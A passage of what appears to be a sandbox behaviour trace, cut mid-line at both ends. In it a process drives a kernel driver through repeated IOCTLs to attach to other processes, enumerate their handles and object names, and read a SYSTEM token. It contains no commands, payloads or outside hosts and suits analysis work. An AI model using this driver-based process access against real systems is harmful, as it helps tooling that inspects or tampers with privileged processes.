lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0218.620] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0218.620] PsAcquireProcessExitSynchronization () returned 0x0 [0218.620] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0218.812] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002cd7070, HandleInformation=0x0) returned 0x0 [0218.812] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0218.812] PsReleaseProcessExitSynchronization () returned 0x2 [0218.812] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0218.812] ObQueryNameString (in: Object=0xfffffa8002cd7070, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0218.812] ObfDereferenceObject (Object=0xfffffa8002cd7070) returned 0x1 [0218.812] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0218.813] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0218.813] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0218.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0218.813] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0218.813] PsAcquireProcessExitSynchronization () returned 0x0 [0218.813] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0219.213] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002cd7f20, HandleInformation=0x0) returned 0x0 [0219.213] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0219.214] PsReleaseProcessExitSynchronization () returned 0x2 [0219.214] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0219.214] ObQueryNameString (in: Object=0xfffffa8002cd7f20, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0219.214] ObfDereferenceObject (Object=0xfffffa8002cd7f20) returned 0x1 [0219.214] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0219.214] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0219.214] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0219.214] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0219.214] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0219.214] PsAcquireProcessExitSynchronization () returned 0x0 [0219.214] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0219.727] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002cd7dd0, HandleInformation=0x0) returned 0x0 [0219.727] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0219.727] PsReleaseProcessExitSynchronization () returned 0x2 [0219.727] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0219.727] ObQueryNameString (in: Object=0xfffffa8002cd7dd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0219.728] ObfDereferenceObject (Object=0xfffffa8002cd7dd0) returned 0x1 [0219.728] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0219.728] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0219.728] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0219.728] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0219.728] PsLookupProcessByProcessId (in: ProcessId=0x104, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0219.728] PsAcquireProcessExitSynchronization () returned 0x0 [0219.728] KeStackAttachProcess (in: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8007ff84f0, ApcState=0xfffff880052b35d0) [0220.188] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0006f3970, HandleInformation=0x0) returned 0x0 [0220.188] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.188] PsReleaseProcessExitSynchronization () returned 0x2 [0220.188] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x16 [0220.189] ObQueryNameString (in: Object=0xfffff8a0006f3970, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.189] ObfDereferenceObject (Object=0xfffff8a0006f3970) returned 0x1 [0220.189] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.189] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xc8 [0220.189] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0220.189] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8003533060, HandleInformation=0x0) returned 0x0 [0220.189] ObOpenObjectByPointer (in: Object=0xfffffa8003533060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000838) returned 0x0 [0220.189] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7b [0220.189] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000838, DesiredAccess=0x8, TokenHandle=0xfffffa8003a188c0 | out: TokenHandle=0xfffffa8003a188c0*=0xc4) returned 0x0 [0220.189] ZwClose (Handle=0xffffffff80000838) returned 0x0 [0220.189] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.190] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0220.190] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0220.677] CloseHandle (hObject=0xc4) returned 1 [0220.677] CloseHandle (hObject=0xc8) returned 1 [0220.677] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.677] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0220.677] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.677] PsAcquireProcessExitSynchronization () returned 0x0 [0220.677] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.677] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003535f20, HandleInformation=0x0) returned 0x0 [0220.677] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.677] PsReleaseProcessExitSynchronization () returned 0x2 [0220.677] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.677] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0220.677] ObfDereferenceObject (Object=0xfffffa8003535f20) returned 0x1 [0220.677] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.678] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.678] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x36, lpOverlapped=0x0) returned 1 [0220.678] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.678] PsAcquireProcessExitSynchronization () returned 0x0 [0220.678] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.678] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a004425850, HandleInformation=0x0) returned 0x0 [0220.678] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.678] PsReleaseProcessExitSynchronization () returned 0x2 [0220.678] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.678] ObQueryNameString (in: Object=0xfffff8a004425850, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.678] ObfDereferenceObject (Object=0xfffff8a004425850) returned 0x2 [0220.678] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.678] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.678] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.678] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.679] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.679] PsAcquireProcessExitSynchronization () returned 0x0 [0220.679] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.679] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0000ff5a0, HandleInformation=0x0) returned 0x0 [0220.679] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.679] PsReleaseProcessExitSynchronization () returned 0x2 [0220.679] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.679] ObQueryNameString (in: Object=0xfffff8a0000ff5a0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.679] ObfDereferenceObject (Object=0xfffff8a0000ff5a0) returned 0x1 [0220.679] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.679] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.679] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.679] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.680] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.680] PsAcquireProcessExitSynchronization () returned 0x0 [0220.680] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.680] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a008995de0, HandleInformation=0x0) returned 0x0 [0220.680] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.680] PsReleaseProcessExitSynchronization () returned 0x2 [0220.680] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.680] ObQueryNameString (in: Object=0xfffff8a008995de0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.680] ObfDereferenceObject (Object=0xfffff8a008995de0) returned 0x1 [0220.680] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.680] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.680] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0220.680] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.680] PsAcquireProcessExitSynchronization () returned 0x0 [0220.681] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.681] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003650f20, HandleInformation=0x0) returned 0x0 [0220.681] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.681] PsReleaseProcessExitSynchronization () returned 0x2 [0220.681] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.681] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0220.681] ObfDereferenceObject (Object=0xfffffa8003650f20) returned 0x1 [0220.681] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.681] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.681] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.681] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.681] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.681] PsAcquireProcessExitSynchronization () returned 0x0 [0220.681] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.682] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0089816b0, HandleInformation=0x0) returned 0x0 [0220.682] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.682] PsReleaseProcessExitSynchronization () returned 0x2 [0220.682] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.682] ObQueryNameString (in: Object=0xfffff8a0089816b0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.682] ObfDereferenceObject (Object=0xfffff8a0089816b0) returned 0x1 [0220.682] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.682] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.682] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.682] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.682] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.682] PsAcquireProcessExitSynchronization () returned 0x0 [0220.682] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.683] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00897a600, HandleInformation=0x0) returned 0x0 [0220.683] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.683] PsReleaseProcessExitSynchronization () returned 0x2 [0220.683] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.683] ObQueryNameString (in: Object=0xfffff8a00897a600, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.683] ObfDereferenceObject (Object=0xfffff8a00897a600) returned 0x1 [0220.683] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.683] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.683] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.683] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.683] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.683] PsAcquireProcessExitSynchronization () returned 0x0 [0220.683] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.683] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00899bca0, HandleInformation=0x0) returned 0x0 [0220.683] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.684] PsReleaseProcessExitSynchronization () returned 0x2 [0220.684] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.684] ObQueryNameString (in: Object=0xfffff8a00899bca0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.684] ObfDereferenceObject (Object=0xfffff8a00899bca0) returned 0x1 [0220.684] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.684] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.684] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.684] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.684] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.684] PsAcquireProcessExitSynchronization () returned 0x0 [0220.684] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.684] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001f7d4d0, HandleInformation=0x0) returned 0x0 [0220.684] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.684] PsReleaseProcessExitSynchronization () returned 0x2 [0220.684] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.684] ObQueryNameString (in: Object=0xfffff8a001f7d4d0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.685] ObfDereferenceObject (Object=0xfffff8a001f7d4d0) returned 0x1 [0220.685] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.685] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.685] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.685] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.685] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.685] PsAcquireProcessExitSynchronization () returned 0x0 [0220.685] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.685] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000a47e40, HandleInformation=0x0) returned 0x0 [0220.685] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.685] PsReleaseProcessExitSynchronization () returned 0x2 [0220.685] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.685] ObQueryNameString (in: Object=0xfffff8a000a47e40, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.685] ObfDereferenceObject (Object=0xfffff8a000a47e40) returned 0x1 [0220.685] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.686] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.686] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.686] 